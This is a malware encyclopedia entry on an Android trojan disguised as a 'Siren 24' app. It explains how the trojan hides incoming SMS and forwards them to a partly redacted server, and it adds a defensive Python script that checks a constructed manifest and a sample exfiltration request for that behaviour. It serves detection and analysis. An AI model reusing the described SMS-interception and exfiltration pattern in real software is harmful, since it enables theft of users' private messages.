Threat Encyclopedia

Android/Copon.A!tr.spy

Analysis

Android/Copon.A!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as an application called "Siren 24" that performs no real function. However, once launched, it hides all incoming SMS messages from the end user and forwards captured SMS info to the attacker's server.

Technical Details


The main application is called "Siren 24" (translated from Korean), as seen in Fig1. It comes in the package "com.Copon".

Fig1 : Siren 24 application in main menu
However, when launched, the user merely sees an error message as seen in Fig2.

Fig2 : Upon launching the application
The malicious activity that takes place in the background is completely hidden from the victim and is explained below.
MainActivity : This activity is responsible for displaying the main launch screen seen in Fig2. It also starts the clService that performs the main malicious activity of the application as explained next.
SMS : This receiver is responsible for monitoring incoming SMS messages and hiding them from the victim.
clService : This service monitors incoming SMS messages received on the infected phone. When an SMS is received, the SMS information is forwarded in an HTTP POST message to the attacker's server
"http://XXX.XX.XXX.205:8080/zzz/login.php"
with the following parameters:
  • num1 = [Victim's phone number]
  • num2 = [Phone number of sender of received SMS]
  • com = [Received SMS body]
  • all UTF-8 encoded

Permissions required by the application:
  • INTERNET
  • SEND_SMS
  • RECEIVE_SMS
  • READ_PHONE_STATE
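The component description and the permission list above give a defender two things to check: a manifest that combines SMS reception, phone-state access and network access with a receiver for incoming SMS, and an HTTP POST carrying the num1/num2/com parameters. The following Python script is an added triage example, not code from the sample or from Fortinet. The manifest and the HTTP request it inspects are constructed to match the analysis (component names, package name, parameter names); the SMS_RECEIVED intent action in the receiver and the 203.0.113.205 address standing in for the redacted server IP are assumptions, not details taken from the page.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"  # assumed receiver action

# Minimum permission set an SMS-forwarding trojan needs (from the analysis above).
SMS_EXFIL_PERMISSIONS = {
    "android.permission.INTERNET",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_PHONE_STATE",
}

# Constructed manifest modelled on the components named in the analysis.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.Copon">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <application android:label="Siren 24">
        <activity android:name=".MainActivity"/>
        <receiver android:name=".SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <service android:name=".clService"/>
    </application>
</manifest>
"""


def triage_manifest(xml_text: str) -> dict:
    """Flag a manifest that can both intercept SMS and send data out."""
    root = ET.fromstring(xml_text)
    permissions = {
        el.attrib.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")
    }
    sms_receivers = [
        rec.attrib.get(ANDROID_NS + "name", "")
        for rec in root.iter("receiver")
        if any(a.attrib.get(ANDROID_NS + "name") == SMS_RECEIVED_ACTION
               for a in rec.iter("action"))
    ]
    return {
        "package": root.attrib.get("package", ""),
        "permissions": permissions,
        "sms_receivers": sms_receivers,
        "suspicious": SMS_EXFIL_PERMISSIONS <= permissions and bool(sms_receivers),
    }


# Constructed exfiltration request; the phone numbers and body are made up.
_BODY = "num1=%2B821012345678&num2=%2B821098765432&com=Test+message"
SAMPLE_POST = (
    "POST /zzz/login.php HTTP/1.1\r\n"
    "Host: 203.0.113.205:8080\r\n"  # placeholder for the redacted XXX.XX.XXX.205
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    "\r\n"
    f"{_BODY}"
)
SAMPLE_GET = "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"

EXFIL_PARAMS = {"num1", "num2", "com"}


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def matches_copon_exfil(req: dict) -> bool:
    """True when the request looks like clService's SMS upload."""
    if req["method"] != "POST" or not req["path"].endswith("/login.php"):
        return False
    ctype = req["headers"].get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return False
    return EXFIL_PARAMS <= set(parse_qs(req["body"]))


def extract_exfil_fields(req: dict) -> dict:
    """Decode the stolen fields (UTF-8, form-encoded) for an incident record."""
    params = parse_qs(req["body"], encoding="utf-8")
    return {k: params[k][0] for k in EXFIL_PARAMS if k in params}


if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
    req = parse_http_request(SAMPLE_POST)
    print(matches_copon_exfil(req), extract_exfil_fields(req))
```

The manifest check is deliberately a combination test: RECEIVE_SMS alone is normal for messaging apps, and INTERNET alone is ubiquitous, but all three permissions plus an SMS_RECEIVED receiver in a package that otherwise performs no function is the profile described above. The HTTP check keys on the parameter names rather than the server address, since the address is redacted here and is the easiest thing for a variant to change.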

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.
